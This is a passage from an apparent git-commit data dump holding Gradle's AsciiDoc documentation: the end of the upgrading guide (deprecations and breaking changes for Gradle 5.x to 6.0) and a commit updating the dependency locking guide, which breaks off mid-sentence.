`TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\nMiscellaneous::\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` has been removed. There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation for Groovy now fails the build.\n Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` no longer can inject the metadata or ivy descriptor.\n Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== BuildSrc usage in Gradle settings\n\nAccess to the buildSrc project and its dependencies in gradle settings scripts is now deprecated.\nThis is due to plans to make initialization of gradle builds more efficient.\n\nThis will become an error in Gradle 6.0.\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle up-to-date checks and build cache lookup\nusing different values to those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy. (e.g. `CompileOnlyCopy2`)\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n=== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebu()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two build's build-scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affect the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and that you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n - Variant 'apiElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n - Variant 'runtimeElements' capability test:producer:unspecified:\n - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can workaround by disabling this new behavior on the consumer side:\n\n```\njava {\n disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`)\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n validateTaskProperties.getClasses().setFrom(fileCollection)\n validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and output files of `Sign` tasks are now tracked via `Signature.getToSign()` and `Signature.getFile()`, respectively.\n\n==== Collection properties default to empty collection\n\nIn Gradle 5.0, the collection property instances created using `ObjectFactory` would have no value defined, requiring plugin authors to explicitly set an initial value. This proved to be awkward and error prone so `ObjectFactory` now returns instances with an empty collection as their initial value.\n\n==== Worker API: working directory of a worker can no longer be set\n\nSince JDK 11 no longer supports changing the working directory of a running process, setting the working directory of a worker via its fork options is now prohibited.\nAll workers now use the same working directory to enable reuse.\nPlease pass files and directories as arguments instead. See examples in the <<custom_tasks.adoc#worker_api, Worker API documentation>>.\n\n==== Changes to native linking tasks\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the install name property from `org.gradle.nativeplatform.tasks.LinkSharedLibrary` is affected by this change.\n\n- `getInstallName()` was changed to return a `Property`.\n- `setInstallName(String)` was removed. Use `Property.set()` instead.\n\n==== Passing arguments to Windows Resource Compiler\n\nTo expand our idiomatic <<lazy_configuration.adoc#, Provider API>> practices, the `WindowsResourceCompile` task has been converted to use the Provider API.\n\nPassing additional compiler arguments now follow the same pattern as the `CppCompile` and other tasks.\n\n==== Copied configuration no longer shares a list of `beforeResolve` actions with original\n\nThe list of `beforeResolve` actions are no longer shared between a copied configuration and the original.\nInstead, a copied configuration receives a copy of the `beforeResolve` actions at the time the copy is made.\nAny `beforeResolve` actions added after copying (to either configuration) will not be shared between the original and the copy.\nThis may break plugins that relied on the previous behaviour.\n\n==== Changes to incubating POM customization types\n\n- The type of `MavenPomDeveloper.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n- The type of `MavenPomContributor.properties` has changed from `Property<Map<String, String>>` to `MapProperty<String, String>`.\n\n==== Changes to specifying operating system for native projects\n\nThe incubating `operatingSystems` property on native components has been replaced with the link:{javadocPath}\/org\/gradle\/language\/cpp\/CppComponent.html#getTargetMachines()[targetMachines] property.\n\n==== Changes for archive tasks (`Zip`, `Jar`, `War`, `Ear`, `Tar`)\n\n===== Change in behavior for tasks extending `AbstractArchiveTask`\n\nThe `AbstractArchiveTask` has several new properties using the <<lazy_configuration.adoc#sec:lazy_configuration_reference,Provider API>>.\nPlugins that extend these types and override methods from the base class may no longer behave the same way.\nInternally, `AbstractArchiveTask` prefers the new properties and methods like `getArchiveName()` are fa\u00e7ades over the new properties.\n\nIf your plugin\/build only uses these types (and does not extend them), nothing has changed.\n\n===== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can be specify that explicitly:\n\n```\ntask archive(type: Zip) {\n duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n archiveName = 'archive.zip'\n from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n\n\/\/\/\/\n== Changes in detail\n\n[[rel5.X:title]]\n=== [5.X] Title\n\nDetails...\n\/\/\/\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"67f3093873ab1ca8ef8d28c0dd9a75bfffa64d41","subject":"Improve single lockfile per project documentation","message":"Improve single lockfile per project documentation\n\nIssue #12450\n","repos":"blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/02-declaring-dependency-versions\/dependency_locking.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/dep-man\/02-declaring-dependency-versions\/dependency_locking.adoc","new_contents":"[[dependency-locking]]\n= Locking dependency versions\n\nUse of dynamic dependency versions (e.g. `1.+` or `[1.0,2.0)`) makes builds non-deterministic.\nThis causes builds to break without any obvious change, and worse, can be caused by a transitive dependency that the build author has no control over.\n\nTo achieve https:\/\/reproducible-builds.org\/[reproducible builds], it is necessary to _lock_ versions of dependencies and transitive dependencies such that a build with the same inputs will always resolve the same module versions.\nThis is called _dependency locking_.\n\nIt enables, amongst others, the following scenarios:\n\n* Companies dealing with multi repositories no longer need to rely on `-SNAPSHOT` or changing dependencies,\nwhich sometimes result in cascading failures when a dependency introduces a bug or incompatibility.\nNow dependencies can be declared against major or minor version range, enabling to test with the latest versions on CI while leveraging locking for stable developer builds.\n* Teams that want to always use the latest of their dependencies can use dynamic versions, locking their dependencies only for releases.\nThe release tag will contain the lock states, allowing that build to be fully reproducible when bug fixes need to be developed.\n\nCombined with <<publishing_maven.adoc#publishing_maven:resolved_dependencies,publishing resolved versions>>, you can also replace the declared dynamic version part at publication time.\nConsumers will instead see the versions that your release resolved.\n\nLocking is enabled per <<declaring_dependencies.adoc#sec:what-are-dependency-configurations,dependency configuration>>.\nOnce enabled, you must create an initial lock state.\nIt will cause Gradle to verify that resolution results do not change, resulting in the same selected dependencies even if newer versions are produced.\nModifications to your build that would impact the resolved set of dependencies will cause it to fail.\nThis makes sure that changes, either in published dependencies or build definitions, do not alter resolution without adapting the lock state.\n\n[NOTE]\n====\nDependency locking makes sense only with <<dynamic_versions.adoc#sub:declaring_dependency_with_dynamic_version,dynamic versions>>.\nIt will have no impact on <<dynamic_versions.adoc#sub:declaring_dependency_with_changing_version,changing versions>> (like `-SNAPSHOT`) whose coordinates remain the same, though the content may change.\nGradle will even emit a warning when persisting lock state and changing dependencies are present in the resolution result.\n====\n\n== Enabling locking on configurations\n\nLocking of a configuration happens through the link:{groovyDslPath}\/org.gradle.api.artifacts.ResolutionStrategy.html[ResolutionStrategy]:\n\n.Locking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\nOr the following, as a way to lock all configurations:\n\n.Locking all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=locking-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=locking-all]\"]\n====\n\n[NOTE]\n====\nOnly configurations that can be resolved will have lock state attached to them.\nApplying locking on non resolvable-configurations is simply a no-op.\n====\n\n[NOTE]\n====\nThe above will lock all _project_ configurations, but not the _buildscript_ ones.\n====\n\nYou can also disable locking on a specific configuration.\nThis can be useful if a plugin configured locking on all configurations but you happen to add one that should not be locked.\n\n.Unlocking a specific configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-one]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/unlockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-one]\"]\n====\n\n=== Locking buildscript classpath configuration\n\nIf you apply plugins to your build, you may want to leverage dependency locking there as well.\nIn order to lock the <<plugins.adoc#sec:applying_plugins_buildscript,`classpath` configuration>> used for script plugins, do the following:\n\n.Locking buildscript classpath configuration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/groovy\",files=\"build.gradle[tags=locking-classpath]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingClasspathConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-classpath]\"]\n====\n\n== Generating and updating dependency locks\n\nIn order to generate or update lock state, you specify the `--write-locks` command line argument in addition to the normal tasks that would trigger configurations to be resolved.\nThis will cause the creation of lock state for each resolved configuration in that build execution.\nNote that if lock state existed previously, it is overwritten.\n\n[[lock_all_configurations_in_one_build_execution]]\n=== Lock all configurations in one build execution\n\nWhen locking multiple configurations, you may want to lock them all at once, during a single build execution.\n\nFor this, you have two options:\n\n* Run `gradle dependencies --write-locks`.\nThis will effectively lock all resolvable configurations that have locking enabled.\nNote that in a multi project setup, `dependencies` only is executed on _one_ project, the root one in this case.\n* Declare a custom task that will resolve all configurations\n\n.Resolving all configurations\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/groovy\",files=\"build.gradle[tags=resolve-all]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingAllConfigurations\/kotlin\",files=\"build.gradle.kts[tags=resolve-all]\"]\n====\n\nThat second option, with proper choosing of configurations, can be the only option in the native world, where not all configurations can be resolved on a single platform.\n\n== Lock state location and format\n\nLock state will be preserved in a file located in the folder `gradle\/dependency-locks` inside the project or subproject directory.\nEach file is named by the configuration it locks and has the `lockfile` extension.\nThe one exception to this rule is for configurations for the <<plugins.adoc#sec:applying_plugins_buildscript,buildscript itself>>.\nIn that case the configuration name will be prefixed with `buildscript-`.\n\nThe content of the file is a module notation per line, with a header giving some context.\nModule notations are ordered alphabetically, to ease diffs.\n\n.Lockfile content\n[listing]\n.gradle\/dependency-locks\/compileClasspath.lockfile\n----\ninclude::{samplesPath}\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\/gradle\/dependency-locks\/compileClasspath.lockfile[]\n----\n\nwhich matches the following dependency declaration:\n\n.Dynamic dependency declaration\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/groovy\",files=\"build.gradle[tags=locking-deps]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleConfiguration\/kotlin\",files=\"build.gradle.kts[tags=locking-deps]\"]\n====\n\n== Running a build with lock state present\n\nThe moment a build needs to resolve a configuration that has locking enabled and it finds a matching lock state,\nit will use it to verify that the given configuration still resolves the same versions.\n\nA successful build indicates that the same dependencies are used as stored in the lock state, regardless if new versions matching the dynamic selector have been produced.\n\nThe complete validation is as follows:\n\n* Existing entries in the lock state must be matched in the build\n** A version mismatch or missing resolved module causes a build failure\n* Resolution result must not contain extra dependencies compared to the lock state\n\n[[fine_tuning_dependency_locking_behaviour_with_lock_mode]]\n=== Fine tuning dependency locking behaviour with lock mode\n\nWhile the default lock mode behaves as described above, two other modes are available:\n\nStrict mode::\nIn this mode, in addition to the validations above, dependency locking will fail if a configuration marked as _locked_ does not have lock state associated with it.\n\nLenient mode::\nIn this mode, dependency locking will still pin dynamic versions but otherwise changes to the dependency resolution are no longer errors.\n\nThe lock mode can be controlled from the `dependencyLocking` block as shown below:\n\n.Setting the lock mode\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/groovy\",files=\"build.gradle[tags=lock-mode]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockModeSelection\/kotlin\",files=\"build.gradle.kts[tags=lock-mode]\"]\n====\n\n[[selectively_updating_lock_state_entries]]\n== Selectively updating lock state entries\n\nIn order to update only specific modules of a configuration, you can use the `--update-locks` command line flag.\nIt takes a comma (`,`) separated list of module notations.\nIn this mode, the existing lock state is still used as input to resolution, filtering out the modules targeted by the update.\n\n----\n\u276f gradle classes --update-locks org.apache.commons:commons-lang3,org.slf4j:slf4j-api\n----\n\nWildcards, indicated with `*`, can be used in the group or module name. They can be the only character or appear at the end of the group or module respectively.\nThe following wildcard notation examples are valid:\n\n* `org.apache.commons:*`: will let all modules belonging to group `org.apache.commons` update\n* `*:guava`: will let all modules named `guava`, whatever their group, update\n* `org.springframework.spring*:spring*`: will let all modules having their group starting with `org.springframework.spring` and name starting with `spring` update\n\n[NOTE]\n====\nThe resolution may cause other module versions to update, as dictated by the Gradle resolution rules.\n====\n\n== Disabling dependency locking\n\n. Make sure that the configuration for which you no longer want locking is not configured with locking.\n. Remove the file matching the configurations where you no longer want locking.\n\nIf you only perform the second step above, then locking will effectively no longer be applied.\nHowever, if that configuration happens to be resolved in the future at a time where lock state is persisted, it will once again be locked.\n\n== Single lock file per project\n\nGradle supports an improved lock file format.\nThe goal is to have only a single lock file per project, which contains the lock state for all configurations of said project.\nBy default, the file is named `gradle.lockfile` and is located inside the project directory.\nThe lock state for the buildscript itself is found in a file named `buildscript-gradle.lockfile` inside the project directory.\n\nThe main benefit is a substantial reduction in the number of lock files compared to the format requiring one lockfile per locked configuration.\n\nThis format requires a migration for existing locking users and is thus opt-in.\n\n[NOTE]\n====\nThe objective is to default to this single lock file per project in Gradle 7.0.\n====\n\nThe format can be activated by enabling the matching <<feature_lifecycle#feature_preview, feature preview>>:\n\n.Single lock file per project activation\n====\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/groovy\",files=\"settings.gradle[]\"]\ninclude::sample[dir=\"snippets\/userguide\/dependencyManagement\/dependencyLocking\/lockingSingleFilePerProject\/kotlin\",files=\"settings.gradle.kts[]\"]\n====\n\nThen with the following dependency declaration and locked configurations:\n\n.Explicit 